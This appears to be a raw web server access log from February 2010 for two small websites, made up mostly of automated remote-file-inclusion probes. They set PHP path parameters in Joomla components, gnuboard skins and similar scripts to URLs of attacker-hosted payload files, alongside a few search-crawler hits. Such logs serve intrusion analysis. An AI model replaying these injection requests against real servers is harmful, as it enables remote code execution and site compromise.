216.104.40.170 - - [15/Feb/2010:06:40:50 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:06:40:50 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:06:42:58 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:06:42:58 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:06:42:58 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:06:43:37 -0800] "GET /logs/access_100125.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.249.103.31 - - [15/Feb/2010:06:47:02 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.249.103.31 - - [15/Feb/2010:06:47:02 -0800] "GET /logs/access.log%20%20//bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.249.103.31 - - [15/Feb/2010:06:47:02 -0800] "GET /logs//bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.142.61.173 - - [15/Feb/2010:06:47:04 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.142.61.173 - - [15/Feb/2010:06:47:04 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.142.61.173 - - [15/Feb/2010:06:47:04 -0800] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.249.103.31 - - [15/Feb/2010:06:47:06 -0800] "GET /logs//bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.249.103.31 - - [15/Feb/2010:06:47:06 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.249.103.31 - - [15/Feb/2010:06:47:06 -0800] "GET /logs/access.log%20%20//bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.87.240.120 - - [15/Feb/2010:06:47:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.87.240.120 - - [15/Feb/2010:06:47:16 -0800] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.87.240.120 - - [15/Feb/2010:06:47:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.87.240.120 - - [15/Feb/2010:06:47:17 -0800] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.87.240.120 - - [15/Feb/2010:06:47:17 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.87.240.120 - - [15/Feb/2010:06:47:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:06:49:56 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:06:49:56 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:06:49:56 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:06:52:57 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:06:52:57 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:06:52:57 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:06:53:32 -0800] "GET /logs/access_100125.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:06:53:57 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.172.236.41 - - [15/Feb/2010:06:53:57 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.172.236.41 - - [15/Feb/2010:06:53:57 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:54:08 -0800] "GET /logs///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:54:09 -0800] "GET /logs/access.log///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:54:09 -0800] "GET //gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.239.230.130 - - [15/Feb/2010:06:55:01 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:06:55:01 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:06:56:07 -0800] "GET /logs///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:56:08 -0800] "GET //gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:56:15 -0800] "GET /logs/access.log%20%20///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:56:20 -0800] "GET //gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:56:20 -0800] "GET /logs///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:56:25 -0800] "GET /logs/access.log%20%20///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:58:13 -0800] "GET /logs///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:58:14 -0800] "GET //gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:58:18 -0800] "GET /logs/access.log///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.172.236.41 - - [15/Feb/2010:06:58:22 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:06:58:22 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:06:58:22 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:06:59:08 -0800] "GET /logs///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:59:08 -0800] "GET //gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:06:59:08 -0800] "GET /logs/access.log%20%20///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.205.120.218 - - [15/Feb/2010:06:59:39 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.205.120.218 - - [15/Feb/2010:06:59:43 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.205.120.218 - - [15/Feb/2010:06:59:43 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.205.120.218 - - [15/Feb/2010:06:59:49 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.205.120.218 - - [15/Feb/2010:06:59:49 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.205.120.218 - - [15/Feb/2010:06:59:49 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.177.66 - - [15/Feb/2010:07:00:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:07:01:43 -0800] "GET /logs/access.log%20%20///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:07:01:43 -0800] "GET //gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:07:01:43 -0800] "GET /logs///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.172.236.41 - - [15/Feb/2010:07:01:55 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.172.236.41 - - [15/Feb/2010:07:01:55 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.172.236.41 - - [15/Feb/2010:07:01:55 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [15/Feb/2010:07:02:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.205.6.233 - - [15/Feb/2010:07:02:12 -0800] "GET /logs/access_091214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.205.6.233 - - [15/Feb/2010:07:02:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:02:36 -0800] "GET /logs/access_091214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:02:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:02:36 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:03:40 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:03:40 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:03:41 -0800] "GET /logs/access_091214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.205.6.233 - - [15/Feb/2010:07:03:53 -0800] "GET /logs/access_091214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:07:04:21 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:04:34 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:04:34 -0800] "GET /logs/access_091214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:04:35 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:07:04:55 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:07:04:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:07:04:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:07:05:07 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.213.93.197 - - [15/Feb/2010:07:05:08 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.213.93.197 - - [15/Feb/2010:07:05:08 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.213.93.197 - - [15/Feb/2010:07:05:08 -0800] "GET /logs/access_100125.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.205.120.218 - - [15/Feb/2010:07:05:11 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.213.93.197 - - [15/Feb/2010:07:05:17 -0800] "GET /logs/access_100118.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:05:18 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:05:18 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:07:05:18 -0800] "GET /logs/access_091214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:07:05:21 -0800] "GET /logs/access_100125.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:07:05:48 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.40.170 - - [15/Feb/2010:07:06:08 -0800] "GET /logs/access_100125.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.205.120.218 - - [15/Feb/2010:07:06:16 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.108.150.235 - - [15/Feb/2010:07:07:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [15/Feb/2010:07:07:53 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [15/Feb/2010:07:07:54 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [15/Feb/2010:07:07:55 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [15/Feb/2010:07:07:57 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [15/Feb/2010:07:07:58 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
80.172.236.41 - - [15/Feb/2010:07:09:49 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:07:10:28 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.217 - - [15/Feb/2010:07:13:30 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
66.249.65.239 - - [15/Feb/2010:07:21:05 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
219.240.36.36 - - [15/Feb/2010:07:21:43 -0800] "GET /logs/access_100125.log//twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
219.240.36.36 - - [15/Feb/2010:07:21:43 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
219.240.36.36 - - [15/Feb/2010:07:21:44 -0800] "GET /logs//twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
202.133.244.22 - - [15/Feb/2010:07:22:08 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.133.244.22 - - [15/Feb/2010:07:22:08 -0800] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
